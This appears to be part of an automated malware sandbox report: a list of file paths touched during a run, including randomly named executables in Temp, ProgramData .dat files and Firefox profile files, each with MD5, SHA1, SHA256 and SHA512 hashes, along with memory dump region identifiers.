C:\ProgramData\508FD350ACC60399.dat
| MD5 | 3ea18b675809540f2607c68906a1288e |
| SHA1 | 77419b2401ff7c3d9eddc3018a2565d8673d6e2c |
| SHA256 | cc7217e2425007bea6837a66c08fe368b3f57cc5bc4130b15e338e624c5b529f |
| SHA512 | bed714da330681dd4ec01c43f3a2ae36f8abce2aae0016aeb631f2c1fa6ea1165ba9e4ff6341450dda186a4842007769e87750d7020d02a0bec3a66bdaa196cc |
C:\ProgramData\140F5167DC6BE219.dat
| MD5 | 119b7eba367c49d531dae8c62ca74386 |
| SHA1 | a8975fb5b6154c7402977f40b6f8bb93b05776c3 |
| SHA256 | 6687b299a3292cfcaf96bc9c22c8aec2afdd2934b91b253214ee22b9b4140a76 |
| SHA512 | 88d87d2cc1b923eff7d2effdd22323dafaf417b9da08d3cd66955900d8ad071139794da35173025f7621fa268a36f66ef7098f1467629a41888f185724fa1442 |
C:\ProgramData\18A8FC50D25A5F96.dat
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\ProgramData\3A63027C04D889B8.dat
| MD5 | 2af05c837619933dba8ef7413b504701 |
| SHA1 | ccd925653d6c87816768b7f8c0592f88d30c7fb5 |
| SHA256 | 6f74c08b173af69de63ffa61dba097befc758e3108f2abc00e43bb7e563fa2cc |
| SHA512 | bbd711c89ccc3f0184e2e8686d1c285b1d28ef81889d049a5c8325f8c6a6f6b4ea938023af25d868a61517b2957951ed17ce94b07415aa0e324c22f0012d1f76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I86J5WJL\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe
| MD5 | 932b3c66bbc714c1f9fdf5a841a53863 |
| SHA1 | cd2bcbc950a772d1b0b53a8961997ff32906be1d |
| SHA256 | a8b0ffbbc57214cbe166084665fbbf0c81b989e6c9a7e6df3e28d8d2bf2cc7e1 |
| SHA512 | f4971846b1bafd604856e96465b9e6df2492c57f3cc19cc085b9f8cd6e100c2275b1e4d6f8ded65fe5b352ca2194b3f956ac6f33c1385727a928c8e44ab1fb8a |
memory/4904-440-0x0000000000D40000-0x0000000001049000-memory.dmp
memory/1988-442-0x0000000000AB0000-0x00000000014AC000-memory.dmp
memory/1988-443-0x0000000000AB0000-0x00000000014AC000-memory.dmp
memory/2212-445-0x0000000000050000-0x0000000000348000-memory.dmp
memory/2016-449-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1988-448-0x0000000000AB0000-0x00000000014AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe
| MD5 | 655697ac09c74c41ed719736103c40e7 |
| SHA1 | 7641ab00bfb93d90660aa44c91a2ac6a1518f134 |
| SHA256 | 77cdb927f92b6d97a88f12fdbf7da51844fea64dfea67653e3a44a9759aba66d |
| SHA512 | 431f8ed6a81d954c045982b3e4653fa946e1e35839e6a83dbc4f572918af88514bfba29968f47e7a638d20bffdfb87402cf784deb43c94b7e73d944f66732c59 |
memory/4972-465-0x00000000001F0000-0x00000000008A3000-memory.dmp
memory/4972-473-0x00000000001F0000-0x00000000008A3000-memory.dmp
memory/2212-475-0x0000000000050000-0x0000000000348000-memory.dmp
memory/4904-481-0x0000000000D40000-0x0000000001049000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe
| MD5 | cf70eeed9e6093c83dc6338226d2fee9 |
| SHA1 | c854a8b3d9558541aeade0f01224fc7e8ad92fce |
| SHA256 | d4a1f66f891ec93a587d6513b2365179c814e1d734c5b5bc7311301a676719e5 |
| SHA512 | c9796f73fd93e8ea960d1dcd834b5a89e2457ca519f6717ac715c09575237de6291a43786b9cc29e7b8f7ba216ae223ea09db0dff30b521c2eb26e8cd8ce2885 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\9a2ec262-9b5b-4cb3-8ee2-5e127c710b70
| MD5 | d59c6e42dd1ac7688e8b900333f2b1c3 |
| SHA1 | d1b693bdd484da1f8cd34d30e92719b7e92a5db7 |
| SHA256 | 3a843da6d93d248e521c822a924111688ee4e130b61a434c0dcde4492b7d87ce |
| SHA512 | 79186879054ea2f0240407e95ba7a584f42b20db05b48735c8474b831bab182cf3416ba5704c1df271e701655bd1d93e23be32b2df0675f3a3f12bc8cfd30889 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 098e38abc691c26b052a34d541052a82 |
| SHA1 | 8e2a7aeaee35fb6ae36d93f350230960dde6a5c9 |
| SHA256 | 1ab56841c67f69380527cc6baa952f5e5e5fb29ddf7325652424b051b6bdeba4 |
| SHA512 | 409d0654197893f4ffe3850115b031c1291105a7b3588446a335718f88bef1e77af2f444ed10d8ae3c4baf49719a1789ba7cd914ca88c41e02450309e74a7017 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\46e2021d-5103-430b-8511-2daebf94e384
| MD5 | 6cbb30e0166a1f76dcb212edaf456bfe |
| SHA1 | 17fb08fa37720881546c1caa3449de7679771d59 |
| SHA256 | 5014d01183d2215d80321d6d5bfcea025c89dc149b6af52cb6e0c88d0e35bb55 |
| SHA512 | dc2471fb5d91954e01f64dee7b7cd951b2789e41cafde15a0eb0006a8c7dffbca1bbf58da57556734054ce9be78a9d1e7e64b0246c43ea60b4e67cbf0c7f254d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2899db646c514cc91916401e5492434f |
| SHA1 | 8831f1990e852a45e7e5a1743571a3e525681b63 |
| SHA256 | c9fdd166ec11b85e5d8fcb2e45135ece79d2724e1e2eff810ca9810236d48f46 |
| SHA512 | f973642b63cf080a677ee65d044874719079d5c14420a3edbd5818317fd1e7315ba74e6ff2560c96d0c88e5094bec8a820c2dd96e16ec5984bf016ddf05ecd62 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin
| MD5 | 82a16dcbecb2110ff29beabf1750fab5 |
| SHA1 | 85b715479203126cda7213b26dd4fbf9bf2bf5d5 |
| SHA256 | 305abaf34bb4f21d68338a40a0770cd89a21bd4597313f540101ad3a8731f01c |
| SHA512 | a092a68e76f69b7e8570c65c81b628878b55ec8324f38c37078f4dca58809f397e4298c207263911ba6f94526e0f12c4b7874cc9791b5c7a8ae6e85f0ec909f3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js
| MD5 | 850144c018eff92f07e5d99b0a7b30f8 |
| SHA1 | 8ed6f1df9b4589de1cfcc2dcaacc0a4980e745f1 |
| SHA256 | 5cb8c9a9815dc2f59122a38f3c99812a33e66cd47746bf5f3d385d811fcd2678 |
| SHA512 | 3e91daa8892d6b9e0c069a24123015c8720b2ea2dfd8b1783c6719ff891a92610fe55ccffbf10afa655fd8aa9aa38f494d2f0f9501512b76f46a9160ca11ed60 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js
| MD5 | 7ddffd2adba83fd683bda9ab45d757aa |
| SHA1 | 50dedf5865856d880eaa88a71c082c888e68c855 |
| SHA256 | 57021c903108c2077ebc3725c1e81b60316d20f00f022a9f7c049a3c7a720a1a |
| SHA512 | 060757df8f9ed8a9fea277917633f7717c4006d63f9796e6c9d347fb49c3498ff650d4a07cc19fedc507067498f0a556ea86aa67c3341886bc1fadef00d91c7a |
C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe
| MD5 | 19525425361a89e2a13bfda00bce4f2f |
| SHA1 | f766e61138d15675516f434e4fbfa7b27e49edbb |
| SHA256 | 79841400858b03959ccf05615db0d7e3d59f3bb80818e2547f9aa07afd2ad667 |
| SHA512 | cbde52614db36e058a560225856d32187739b0e2f741de9552c8c74ae4291de9c66d684cdc890d18c1e341dc5ed418dcdf9d52d4cb1a4ce498fffebcd1a8f28f |
memory/2276-845-0x0000000000250000-0x00000000006AC000-memory.dmp
memory/2276-846-0x0000000000250000-0x00000000006AC000-memory.dmp
memory/2276-847-0x0000000000250000-0x00000000006AC000-memory.dmp
memory/2276-872-0x0000000000250000-0x00000000006AC000-memory.dmp
memory/2276-875-0x0000000000250000-0x00000000006AC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MGQ8IQ23\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5917cb5f4ff83241584f91fa851df323 |
| SHA1 | 1cbd28f5d9123016e2155c03f846b3dda18cfbc5 |
| SHA256 | 83f47699d65765ee5fddc952159fb2d686bfab868ca55a6e67b9cc3854f82126 |
| SHA512 | 3572a200e36d01ff756989ef5ca326722346f7fe6e005ffac7f3318738c8b37a65aaca8248db10602c73abf4b33e3b6b9c4bd29e5faebc653306843d25bdb640 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin
| MD5 | 52c201c0b0ced0f0c3c117fda5ce6d7f |
| SHA1 | a9ae4e9636bd447b27defa568881e845ee5c194d |
| SHA256 | 02909e7ced7d7c63993aedaa95ac1f6884908d5177759aa6f6ede23b5356f829 |
| SHA512 | d507c5216901634801a5264a596c675a4982702ec2b28c688ccdb0a2a54990d07e9feaa04a76b4153c21a59a889240a3b93697896a22d31831bc173f11530033 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js
| MD5 | fa166feb0f3da3b9855974a55dda3100 |
| SHA1 | 41b4a4aad99bca7938a04e09d8b4f721cef06488 |
| SHA256 | 2bc2e2fa5441da48f17f525ec70a5cb4555e4b1d1d2527fd83ccb103ea013d70 |
| SHA512 | 0c04f3a77185dee9187de48a32ec48d1343407e47ad98ff2684fa1e19a457e0dadd92fbf09ae1dac55995765072938191ce17bea10340d69456e526d4a05ee02 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
| MD5 | 0c068cd0f69e1d3d0208c1da1ee0e15c |
| SHA1 | 369d15394d5e19686aada59ecd72135e92f13240 |
| SHA256 | 431a590a033bcc457de22d761c23f213fdae04ce3a7c9e0471fd502170ae6b79 |
| SHA512 | b9f99d7bba5bd5c4fab593673c99ad66f9ec8e4e925f8bb046baca8bde603ca5df40e00ad42d0450d06f615955f6803d27778299b94308f83871d7719fcae204 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js
| MD5 | 76a90b8dcd3782db143eb4191e2686c5 |
| SHA1 | 8b4f7c6134bbbc858e409e96a388fa93672f5fb3 |
| SHA256 | 2cb2435291457d3164c7fd4c64b0f555b9c1be463e96425f6bdc4a81d49933b0 |
| SHA512 | 0cf35a410cb3819a8c906e5a118bcd3815ef4c793afc19bee2d92bca549e01dcdd7825f50b7ab2357080b4af8365050d00b14e3ab5628c5afdf49b4d2993bcab |